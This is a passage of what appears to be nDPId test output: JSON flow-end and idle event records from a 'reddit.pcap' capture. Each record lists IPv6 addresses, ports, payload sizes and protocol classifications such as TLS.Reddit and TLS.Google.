-00735{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1605291690926,"flow_last_seen":1605291691053,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36966,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} 
-00735{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291690926,"flow_last_seen":1605291691064,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3815,"flow_avg_l4_payload_len":200,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36968,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} -00735{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1605291690926,"flow_last_seen":1605291691062,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3816,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36970,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} 
-00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1605291690992,"flow_last_seen":1605291691029,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36972,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00617{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1605291690992,"flow_last_seen":1605291691029,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80f::2001","src_port":36972,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291687934,"flow_last_seen":1605291688340,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6623,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"}} -00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":847,"flow_first_seen":1605291684452,"flow_last_seen":1605291698703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6245,"flow_tot_l4_payload_len":482020,"flow_avg_l4_payload_len":569,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":114,"flow_first_seen":1605291688843,"flow_last_seen":1605291691232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2416,"flow_tot_l4_payload_len":69230,"flow_avg_l4_payload_len":607,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
-00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291684481,"flow_last_seen":1605291684654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4527,"flow_avg_l4_payload_len":266,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00725{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291688843,"flow_last_seen":1605291689005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3846,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
-00721{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605291686035,"flow_last_seen":1605291686148,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1442,"flow_first_seen":1605291686035,"flow_last_seen":1605291696381,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11528,"flow_tot_l4_payload_len":1922359,"flow_avg_l4_payload_len":1333,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
-00721{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291686035,"flow_last_seen":1605291686148,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00721{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1605291686035,"flow_last_seen":1605291686148,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
-00721{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291686035,"flow_last_seen":1605291686149,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1605291686035,"flow_last_seen":1605291686156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
-00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686060,"flow_last_seen":1605291686196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":198,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686060,"flow_last_seen":1605291686196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":198,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
-00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":133,"flow_first_seen":1605291686060,"flow_last_seen":1605291697854,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":10480,"flow_tot_l4_payload_len":99015,"flow_avg_l4_payload_len":744,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291686060,"flow_last_seen":1605291686196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4191,"flow_avg_l4_payload_len":246,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
-00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":5480,"flow_first_seen":1605291686064,"flow_last_seen":1605291695840,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9432,"flow_tot_l4_payload_len":5723539,"flow_avg_l4_payload_len":1044,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686064,"flow_last_seen":1605291686203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4547,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
-00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605291686064,"flow_last_seen":1605291686203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4165,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605291686064,"flow_last_seen":1605291686203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4165,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
-00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686084,"flow_last_seen":1605291686232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":198,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1605291686084,"flow_last_seen":1605291686283,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":9920,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
-00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1605291690421,"flow_last_seen":1605291690571,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8079,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} -00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":112,"flow_first_seen":1605291686301,"flow_last_seen":1605291696305,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":40926,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} 
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1605291689408,"flow_last_seen":1605291689979,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":8337,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291688344,"flow_last_seen":1605291688502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":7212,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:9000:219c:ee00:6:44e3:f8c0:93a1","src_port":56186,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":118,"flow_first_seen":1605291686996,"flow_last_seen":1605291688354,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5552,"flow_tot_l4_payload_len":94136,"flow_avg_l4_payload_len":797,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3b6","src_port":38320,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1605291687800,"flow_last_seen":1605291692129,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":8436,"flow_avg_l4_payload_len":187,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"}} 
-00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291690405,"flow_last_seen":1605291690626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":9313,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00740{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1605291688611,"flow_last_seen":1605291688858,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":7595,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"}} 
-00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1605291687642,"flow_last_seen":1605291687853,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2416,"flow_tot_l4_payload_len":36007,"flow_avg_l4_payload_len":521,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} -00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1605291688830,"flow_last_seen":1605291698440,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":18805,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"}} 
-00733{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":146,"flow_first_seen":1605291687485,"flow_last_seen":1605291690985,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5552,"flow_tot_l4_payload_len":121491,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} -00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1605291688324,"flow_last_seen":1605291688572,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6036,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 